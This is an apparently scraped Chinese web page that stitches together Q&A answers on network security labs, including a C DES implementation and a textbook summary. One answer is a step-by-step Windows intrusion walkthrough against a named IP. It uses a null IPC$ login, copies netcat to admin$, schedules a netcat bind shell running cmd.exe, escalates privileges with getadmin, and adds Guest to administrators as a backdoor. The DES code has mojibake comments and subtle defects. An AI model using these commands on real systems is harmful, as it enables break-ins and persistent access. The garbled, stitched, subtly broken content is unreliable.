导航:首页 > 网络安全 > 网络安全技术实验

网络安全技术实验

发布时间:2023-05-21 12:32:20

‘壹’ 网络安全实验室的实验室业务范围

1. 宣传贯彻、监督落实国家计算机信息网络安全政策;
2. 协助政府的计算机安全管理部门制定地方性的有关法规;
3. 接受省公安厅的委托,具体负责检查公共信息网络安全漏洞,评测网络安全等级;
4. 组织研讨计算机信息网络安全问题,推广行之有效的网络安全管理经验;
5. 协助管理机关组织评审、鉴定计算机信息安全技术成果,推介计算机安全产品,促进计算机信息安全产业的发展;
6. 组织举办计算机安全讲座、推广普及计算机安全知识、培训计算机安全管理人员;
7. 开展市场调研和预测,提供计算机安全咨询和计算机安全技术公众服务;
8. 建立与加强同国内外计算机安全组织的联系,促进国内外计算机网络安全学术的交流、互访与合作。

‘贰’ 网络安全实验室的介绍

“云南网络安全实验室”,英文名称为“YunNan Network Security Laboratory”(YnNSL)。 实验室由云南省内的计算机信息系统安全保护主管机关、信息服务部门和计算机安全技术研制开发、产品生产单位,以及有关党政机关、科研单位、高等院校、企事业单位、社会团体、计算机个人用户等自愿组成的非营利性的社会团体,并具备法人资格。

‘叁’ 基于DETERLab的网络安全实验技术是什么意思,最好能提供相关的论文资料。

资料全是英文,看不懂啊。按我的理解就是一个网络安全实验平台。平台比较大,涉及到方方面面。在攻防实验室或者网络安全实验室,国内研究的还不是很深,目前国内的资料基本上都是对国外的研究资料生搬硬套的,并且国内主流的安全厂家,像天融信,启明,绿盟都没有真正意义的像
DETERLab这样的平台。不过据我了解,济南倒是有一家网络安全公司正在研发这个,不过不是基于DETERLab这样的大平台,而是通过虚拟话技术,通过底层开发的。如果研发出来,目前遇到的所有网络安全实验,都能实现,不管是网络攻击,web渗透还是汇编反汇编,都能完成,应该说是国内最好的。唯一不足的就是只能同时进行较少(几十个实验同时进行)的实验,因为通过虚拟化镜像的保存和调用。而DETERLab所有都可以同时进行,毕竟平台构成400多个相关硬件设备。这都是我了解的,也不知道对错,要是我说的不对的,你也跟我说说,咱们相互学习嘛。。至于资料,还真没有,等我找到了,大家一起分享一下。。

‘肆’ 网络信息安全实验

C语言编写的一个判迅DES加密源程序如下,不解释,自己慢慢看:
C语言编写的一个DES加密源程序如下,不解释,自己慢慢看:
#include <stdio.h>
#include <time.h>
#include <stdlib.h>
#include <memory.h>
#define PLAIN_FILE_OPEN_ERROR -1
#define KEY_FILE_OPEN_ERROR -2
#define CIPHER_FILE_OPEN_ERROR -3
#define OK 1;
typedef char ElemType;
int IP_Table[64] = { 57,49,41,33,25,17,9,1,
59,51,43,35,27,19,11,3,
61,53,45,37,29,21,13,5,
63,55,47,39,31,23,15,7,
56,48,40,32,24,16,8,0,
58,50,42,34,26,18,10,2,
60,52,44,36,28,20,12,4,
62,54,46,38,30,22,14,6};
int IP_1_Table[64] = {39,7,47,15,55,23,63,31,
38,6,46,14,54,22,62,30,
37,5,45,13,53,21,61,29,
36,4,44,12,52,20,60,28,
35,3,43,11,51,19,59,27,
34,2,42,10,50,18,58,26,
33,1,41,9,49,17,57,25,
32,0,40,8,48,16,56,24};
int E_Table[48] = {31, 0, 1, 2, 3, 4,
3, 4, 5, 6, 7, 8,
7, 8,9,10,11,12,
11,12,13,14,15,16,
15,16,17,18,19,20,
19,20,21,22,23,24,
23,24,25,26,27,28,
27,28,29,30,31, 0};
int P_Table[32] = {15,6,19,20,28,11,27,16,
0,14,22,25,4,17,30,9,
1,7,23,13,31,26,2,8,
18,12,29,5,21,10,3,24};
int S[8][4][16] =/* S1 */冲亩
{{{14,4,13,1,2,15,11,8,3,10,6,12,5,9,0,7},
{0,15,7,4,14,2,13,1,10,6,12,11,9,5,3,8},
{4,1,14,8,13,6,2,11,15,12,9,7,3,10,5,0},
{15,12,8,2,4,9,1,7,5,11,3,14,10,0,6,13}},
/* S2 */
{{15,1,8,14,6,11,3,4,9,7,2,13,12,0,5,10},
{3,13,4,7,15,2,8,14,12,0,1,10,6,9,11,5},
{0,14,7,11,10,4,13,1,5,8,12,6,9,3,2,15},
{13,8,10,1,3,15,4,2,11,6,7,12,0,5,14,9}},
/* S3 */散冲森
{{10,0,9,14,6,3,15,5,1,13,12,7,11,4,2,8},
{13,7,0,9,3,4,6,10,2,8,5,14,12,11,15,1},
{13,6,4,9,8,15,3,0,11,1,2,12,5,10,14,7},
{1,10,13,0,6,9,8,7,4,15,14,3,11,5,2,12}},
/* S4 */
{{7,13,14,3,0,6,9,10,1,2,8,5,11,12,4,15},
{13,8,11,5,6,15,0,3,4,7,2,12,1,10,14,9},
{10,6,9,0,12,11,7,13,15,1,3,14,5,2,8,4},
{3,15,0,6,10,1,13,8,9,4,5,11,12,7,2,14}},
/* S5 */
{{2,12,4,1,7,10,11,6,8,5,3,15,13,0,14,9},
{14,11,2,12,4,7,13,1,5,0,15,10,3,9,8,6},
{4,2,1,11,10,13,7,8,15,9,12,5,6,3,0,14},
{11,8,12,7,1,14,2,13,6,15,0,9,10,4,5,3}},
/* S6 */
{{12,1,10,15,9,2,6,8,0,13,3,4,14,7,5,11},
{10,15,4,2,7,12,9,5,6,1,13,14,0,11,3,8},
{9,14,15,5,2,8,12,3,7,0,4,10,1,13,11,6},
{4,3,2,12,9,5,15,10,11,14,1,7,6,0,8,13}},
/* S7 */
{{4,11,2,14,15,0,8,13,3,12,9,7,5,10,6,1},
{13,0,11,7,4,9,1,10,14,3,5,12,2,15,8,6},
{1,4,11,13,12,3,7,14,10,15,6,8,0,5,9,2},
{6,11,13,8,1,4,10,7,9,5,0,15,14,2,3,12}},
/* S8 */
{{13,2,8,4,6,15,11,1,10,9,3,14,5,0,12,7},
{1,15,13,8,10,3,7,4,12,5,6,11,0,14,9,2},
{7,11,4,1,9,12,14,2,0,6,10,13,15,3,5,8},
{2,1,14,7,4,10,8,13,15,12,9,0,3,5,6,11}}};
int PC_1[56] = {56,48,40,32,24,16,8,
0,57,49,41,33,25,17,
9,1,58,50,42,34,26,
18,10,2,59,51,43,35,
62,54,46,38,30,22,14,
6,61,53,45,37,29,21,
13,5,60,52,44,36,28,
20,12,4,27,19,11,3};
int PC_2[48] = {13,16,10,23,0,4,2,27,
14,5,20,9,22,18,11,3,
25,7,15,6,26,19,12,1,
40,51,30,36,46,54,29,39,
50,44,32,46,43,48,38,55,
33,52,45,41,49,35,28,31};
int MOVE_TIMES[16] = {1,1,2,2,2,2,2,2,1,2,2,2,2,2,2,1};
int ByteToBit(ElemType ch,ElemType bit[8]);
int BitToByte(ElemType bit[8],ElemType *ch);
int Char8ToBit64(ElemType ch[8],ElemType bit[64]);
int Bit64ToChar8(ElemType bit[64],ElemType ch[8]);
int DES_MakeSubKeys(ElemType key[64],ElemType subKeys[16][48]);
int DES_PC1_Transform(ElemType key[64], ElemType tempbts[56]);
int DES_PC2_Transform(ElemType key[56], ElemType tempbts[48]);
int DES_ROL(ElemType data[56], int time);
int DES_IP_Transform(ElemType data[64]);
int DES_IP_1_Transform(ElemType data[64]);
int DES_E_Transform(ElemType data[48]);
int DES_P_Transform(ElemType data[32]);
int DES_SBOX(ElemType data[48]);
int DES_XOR(ElemType R[48], ElemType L[48],int count);
int DES_Swap(ElemType left[32],ElemType right[32]);
int DES_EncryptBlock(ElemType plainBlock[8], ElemType subKeys[16][48], ElemType cipherBlock[8]);
int DES_DecryptBlock(ElemType cipherBlock[8], ElemType subKeys[16][48], ElemType plainBlock[8]);
int DES_Encrypt(char *plainFile, char *keyStr,char *cipherFile);
int DES_Decrypt(char *cipherFile, char *keyStr,char *plainFile);
int ByteToBit(ElemType ch, ElemType bit[8]){
int cnt;
for(cnt = 0;cnt < 8; cnt++){
*(bit+cnt) = (ch>>cnt)&1;
}
return 0;
}
/* 娴滃矁绻橀崚𨱍版祮阉广垺鍨氱€涙 濡?*/
int BitToByte(ElemType bit[8],ElemType *ch){
int cnt;
for(cnt = 0;cnt < 8; cnt++){
*ch |= *(bit + cnt)<<cnt;
}
return 0;
}
int Char8ToBit64(ElemType ch[8],ElemType bit[64]){
int cnt;
for(cnt = 0; cnt < 8; cnt++){
ByteToBit(*(ch+cnt),bit+(cnt<<3));
}
return 0;
}
int Bit64ToChar8(ElemType bit[64],ElemType ch[8]){
int cnt;
memset(ch,0,8);
for(cnt = 0; cnt < 8; cnt++){
BitToByte(bit+(cnt<<3),ch+cnt);
}
return 0;
}
int DES_MakeSubKeys(ElemType key[64],ElemType subKeys[16][48]){
ElemType temp[56];
int cnt;
DES_PC1_Transform(key,temp);
for(cnt = 0; cnt < 16; cnt++){
DES_ROL(temp,MOVE_TIMES[cnt]);
DES_PC2_Transform(temp,subKeys[cnt]);
}
return 0;
}
int DES_PC1_Transform(ElemType key[64], ElemType tempbts[56]){
int cnt;
for(cnt = 0; cnt < 56; cnt++){
tempbts[cnt] = key[PC_1[cnt]];
}
return 0;
}
int DES_PC2_Transform(ElemType key[56], ElemType tempbts[48]){
int cnt;
for(cnt = 0; cnt < 48; cnt++){
tempbts[cnt] = key[PC_2[cnt]];
}
return 0;
}
int DES_ROL(ElemType data[56], int time){
ElemType temp[56];
memcpy(temp,data,time);
memcpy(temp+time,data+28,time);
memcpy(data,data+time,28-time);
memcpy(data+28-time,temp,time);
memcpy(data+28,data+28+time,28-time);
memcpy(data+56-time,temp+time,time);
return 0;
}
int DES_IP_Transform(ElemType data[64]){
int cnt;
ElemType temp[64];
for(cnt = 0; cnt < 64; cnt++){
temp[cnt] = data[IP_Table[cnt]];
}
memcpy(data,temp,64);
return 0;
}
int DES_IP_1_Transform(ElemType data[64]){
int cnt;
ElemType temp[64];
for(cnt = 0; cnt < 64; cnt++){
temp[cnt] = data[IP_1_Table[cnt]];
}
memcpy(data,temp,64);
return 0;
}
int DES_E_Transform(ElemType data[48]){
int cnt;
ElemType temp[48];
for(cnt = 0; cnt < 48; cnt++){
temp[cnt] = data[E_Table[cnt]];
}
memcpy(data,temp,48);
return 0;
}
int DES_P_Transform(ElemType data[32]){
int cnt;
ElemType temp[32];
for(cnt = 0; cnt < 32; cnt++){
temp[cnt] = data[P_Table[cnt]];
}
memcpy(data,temp,32);
return 0;
}
int DES_XOR(ElemType R[48], ElemType L[48] ,int count){
int cnt;
for(cnt = 0; cnt < count; cnt++){
R[cnt] ^= L[cnt];
}
return 0;
}
int DES_SBOX(ElemType data[48]){
int cnt;
int line,row,output;
int cur1,cur2;
for(cnt = 0; cnt < 8; cnt++){
cur1 = cnt*6;
cur2 = cnt<<2;
line = (data[cur1]<<1) + data[cur1+5];
row = (data[cur1+1]<<3) + (data[cur1+2]<<2)
+ (data[cur1+3]<<1) + data[cur1+4];
output = S[cnt][line][row];
data[cur2] = (output&0X08)>>3;
data[cur2+1] = (output&0X04)>>2;
data[cur2+2] = (output&0X02)>>1;
data[cur2+3] = output&0x01;
}
return 0;
}
int DES_Swap(ElemType left[32], ElemType right[32]){
ElemType temp[32];
memcpy(temp,left,32);
memcpy(left,right,32);
memcpy(right,temp,32);
return 0;
}
int DES_EncryptBlock(ElemType plainBlock[8], ElemType subKeys[16][48], ElemType cipherBlock[8]){
ElemType plainBits[64];
ElemType Right[48];
int cnt;
Char8ToBit64(plainBlock,plainBits);
DES_IP_Transform(plainBits);
for(cnt = 0; cnt < 16; cnt++){
memcpy(Right,plainBits+32,32);
DES_E_Transform(Right);
DES_XOR(Right,subKeys[cnt],48);
DES_SBOX(Right);
DES_P_Transform(Right);
DES_XOR(plainBits,Right,32);
if(cnt != 15){
DES_Swap(plainBits,plainBits+32);
}
}
DES_IP_1_Transform(plainBits);
Bit64ToChar8(plainBits,cipherBlock);
return 0;
}
int DES_DecryptBlock(ElemType cipherBlock[8], ElemType subKeys[16][48],ElemType plainBlock[8]){
ElemType cipherBits[64];
ElemType Right[48];
int cnt;
Char8ToBit64(cipherBlock,cipherBits);
DES_IP_Transform(cipherBits);
for(cnt = 15; cnt >= 0; cnt--){
memcpy(Right,cipherBits+32,32);
DES_E_Transform(Right);
DES_XOR(Right,subKeys[cnt],48);
DES_SBOX(Right);
DES_P_Transform(Right);
DES_XOR(cipherBits,Right,32);
if(cnt != 0){
DES_Swap(cipherBits,cipherBits+32);
}
}
DES_IP_1_Transform(cipherBits);
Bit64ToChar8(cipherBits,plainBlock);
return 0;
}
int DES_Encrypt(char *plainFile, char *keyStr,char *cipherFile){
FILE *plain,*cipher;
int count;
ElemType plainBlock[8],cipherBlock[8],keyBlock[8];
ElemType bKey[64];
ElemType subKeys[16][48];
if((plain = fopen(plainFile,"rb")) == NULL){
return PLAIN_FILE_OPEN_ERROR;
}
if((cipher = fopen(cipherFile,"wb")) == NULL){
return CIPHER_FILE_OPEN_ERROR;
}
memcpy(keyBlock,keyStr,8);
Char8ToBit64(keyBlock,bKey);
DES_MakeSubKeys(bKey,subKeys);
while(!feof(plain)){
if((count = fread(plainBlock,sizeof(char),8,plain)) == 8){
DES_EncryptBlock(plainBlock,subKeys,cipherBlock);
fwrite(cipherBlock,sizeof(char),8,cipher);
}
}
if(count){
memset(plainBlock + count,'\0',7 - count);
plainBlock[7] = 8 - count;
DES_EncryptBlock(plainBlock,subKeys,cipherBlock);
fwrite(cipherBlock,sizeof(char),8,cipher);
}
fclose(plain);
fclose(cipher);
return OK;
}
int DES_Decrypt(char *cipherFile, char *keyStr,char *plainFile){
FILE *plain, *cipher;
int count,times = 0;
long fileLen;
ElemType plainBlock[8],cipherBlock[8],keyBlock[8];
ElemType bKey[64];
ElemType subKeys[16][48];
if((cipher = fopen(cipherFile,"rb")) == NULL){
return CIPHER_FILE_OPEN_ERROR;
}
if((plain = fopen(plainFile,"wb")) == NULL){
return PLAIN_FILE_OPEN_ERROR;
}
memcpy(keyBlock,keyStr,8);
Char8ToBit64(keyBlock,bKey);
DES_MakeSubKeys(bKey,subKeys);
fseek(cipher,0,SEEK_END);
fileLen = ftell(cipher);
rewind(cipher);
while(1){
fread(cipherBlock,sizeof(char),8,cipher);
DES_DecryptBlock(cipherBlock,subKeys,plainBlock);
times += 8;
if(times < fileLen){
fwrite(plainBlock,sizeof(char),8,plain);
}
else{
break;
}
}
if(plainBlock[7] < 8){
for(count = 8 - plainBlock[7]; count < 7; count++){
if(plainBlock[count] != '\0'){
break;
}
}
}
if(count == 7){
fwrite(plainBlock,sizeof(char),8 - plainBlock[7],plain);
}
else{
fwrite(plainBlock,sizeof(char),8,plain);
}
fclose(plain);
fclose(cipher);
return OK;
}
int main()
{
DES_Encrypt("out.xml","key.txt","out.des");
DES_Decrypt("out.des","key.txt","out.des.xml");
return 0;
}

‘伍’ 电子科技大学网络安全与技术实验室怎么

有些偏重理论

‘陆’ 无线网络安全技术国家工程实验室的简介

无线网络安全技术国家工程实验室依托西安电子科技大学捷通公司组建。2008年获批西安市无线网络安全技术工程实验室。三年来,通过不断的技术创新,攻关无线网络通信核心技术,完善无线网络安全通信技术标准体系,成为我国无线网络通信领域协议标准的制定者和领头羊。2011年该工程实验室由西安市发改委上报国家发改委,申请升级为国家工程实验室。
2011年12月,国家发展和改革委员会办公厅下发文件《国家发展改革委办公厅关于无线网络安全技术国家工程实验室项目的复函》(发改办高技[2011]3167号),原则同意无线网络安全技术国家工程实验室的资金申请报告,并下达了建设任务和建设目标。该项目在现有研发和试验条件基础上,建设无线网络安全协议测试技术开发中心、密码工程化验证中心、技术验证与产品开发中心、产业协作推进中心及无线网络安全电子政务应用验证中心、无线网络安全智能电网应用验证中心。建设地点为陕西省西安市。
该工程实验室主要围绕无线网络安全产业发展的市场要求,建设相关产业研发和验证平台,开展无线网络安全基础技术、无线网络安全协议、无线网络系统安全等技术方面的研究,以及技术验证和产业化工作,完善相关技术标准,培养专业人才。工程实验室建成后,将有助于提高我国无线网络安全领域的自主创新能力和核心竞争力。

‘柒’ 为什么要搭建网络安全实验环境

是为了提高网络安全技术州型念人员的技能和能力,以更好地应对网络安册困全威胁。搭建网络安全实租雹验环境可以提供一个真实的网络环境,让网络安全技术人员可以在实验环境中模拟各种网络攻击和防御场景,以更好地了解网络安全威胁和应对方法。搭建网络安全实验环境是为了模拟真实的网络攻防场景,以便于学习和研究网络安全技术、工具和方法。

‘捌’ 网络安全技术的内容简介

《网络安全技术》内容共9章,包含网络安全理论基础、网络攻击与防护、网络安全应用及网络安全实验4个部分。网络安全理论基础部分讲解了网络安全的基础知识、网络安全体系结构、网络协议的安全性以及网络系统平台安全,、使读者初步了解网络安全并掌握网络安全技术的架构。网络攻击与防护部分从攻与防两个角度讲解网络安全技术,包括网络攻击原理及技术、网络安全防护技术。网络安全应用部分讲解了密码技术在网络安全中的应用、网络安全应用。网络安全实验部分从搭建网络安全实验环境开始,分11个项目比较全面地讲解了攻与防等实验:使课程理论与实践紧密地结合起来。
《网络安全技术》内容丰富,技术性强,实现了网络安全理论与应用完美的结合,给读者以实用和最新的网络安全技术。
《网络安全技术》适用范围广,既可以作为高等院校网络安全课程的教材和教学参考书,又可作为网络安全培训教材或自学参考书;对于具有一定网络管理、网络安全基础,并希望进一步提高网络安全技术水平的读者,也是一本理想的技术参考书。

‘玖’ 网络安全课实验题目——破解一台ftp服务器

F:\》net use \\222.181.83.199\ipc$ "" /user:"Administrator"
命令成功完成。

F:\》 nc.exe \\222.181.83.199\admin$
已复制 1 个文件。

F:\》net time \\222.181.83.199
\\222.181.83.199 的当前时间是 2000/12/25 上午 10:25
在 \\222.181.83.199 的本地时间 (GMT - 07:00) 是 2000/12/25 上午10:35
命令成功完成。

F:\》at \\222.181.83.199 10:38 nc -l -p 1234 -t -e cmd.exe
新增加了一项作业,其作业 ID = 0

F:\》telnet 222.181.83.199 1234

上面的命令很简单,你只要参考一下net,at和nc的用法就可以了。这样,我们就登上了远程的主机。最理想的情况是这样的,但是,也许你会遇到目标主机的Schele服务没有启动的情况,那么,at命令就不能用了,我们就需要增加以下步骤。

F:\》at \\1222.181.83.199 10:38 nc -l -p 1234 -t -e cmd.exe
服务仍未启动。

F:\》netsvc \\139.223.200.xxx schele /start
Service is running on \\139.223.200.xxx

登上远程主机之后,我们可以做什么呢?这要视这个帐号的权限以及该主机的安全策略来决定。如果你的权限不够的话,可以试试下面的步骤。首先在本地执行下面的命令。

F:\》 getadmin.exe \\139.223.200.xxx\admin$
已复制 1 个文件。

F:\》 gasys.dll \\139.223.200.xxx\admin$
已复制 1 个文件。

其次,在远程主机运行下面的命令。

C:\WINNT\system32》getadmin

如果成功的话,你就是这台主机的管理员了,权限够大了吧?:-)

那么,现在我们能做什么呢?改主页?下载SAM数据库?都可以啦!方法有很多,我就不一一说了,具体方法可以参考相关教程。我一般对目标主机上的WORD文档和数据库比较感兴趣,呵呵。。。

其实,如果你在这台机子上面放个木马或者病毒什么的东东,做起事来更容易一些,但是我觉得如果你跟他没什么深仇大恨的话,还是不要这么做了,这样不好。

作完了你要做的事,不要忘了做个后门。

C:\WINNT\system32》net user Guest 30906766
net use Guest 30906766
The command completed successfully.

C:\WINNT\system32》net localgroup administrators Guest /add
net localgroup administrators Guest /add
The command completed successfully.

是不是小容的流光啊``怎么连user:" (用户名) 和 ipc$ ""(密码) 都找不了.

‘拾’ 网络安全实验室的网络安全实验室介绍

实验室宗旨是:在遵守宪法、法律、法规和国家政策,遵守社会道德风尚的基础上,根据云南省发展信息产业的需要,充分发挥计算机安全管理部门与计算机用户之间的桥梁作用;协助主管机关规范和加强计算机安全保护工作,促进计算机网络安全技术的发展以及提高网络用户的安全意识,维护我省公共信息网络的安全,保障信息的社会化和产业化的健康发展。
实验室是在云南省民政厅依法登记的法人团体,业务主管部门是云南省公安厅;在行业业务工作中接受云南省公安厅、云南省民政厅的业务指导和监督管理。

阅读全文

与网络安全技术实验相关的资料

热点内容
无线网络很不稳定路由器怎么设置 浏览:539
连接wifi后抓取网络包 浏览:655
金地通网络是什么 浏览:727
审核快的写网络小说软件 浏览:950
x狙击手手机版怎么网络连接 浏览:137
贵州ip网络呼叫中心多少钱 浏览:496
在火车上没有移动网络 浏览:911
路由器哪个是网络指示灯 浏览:682
电脑网络不行wifi可以 浏览:869
贵州网络学校可以考什么事业单位 浏览:801
办公区域网络异常 浏览:921
手机华为登录网络怎么回事 浏览:836
网络毛笔字在哪里学 浏览:491
高中选修网络技术软件哪个好 浏览:413
wifi网络卡有什么办法 浏览:111
插卡路由器的无线网络连接 浏览:923
网络机顶盒有线连接显示无信号 浏览:139
小米手机连接网络数据连不上 浏览:549
上海网络存储服务在哪里找 浏览:681
不用网络的电脑k歌软件哪个好用 浏览:545

友情链接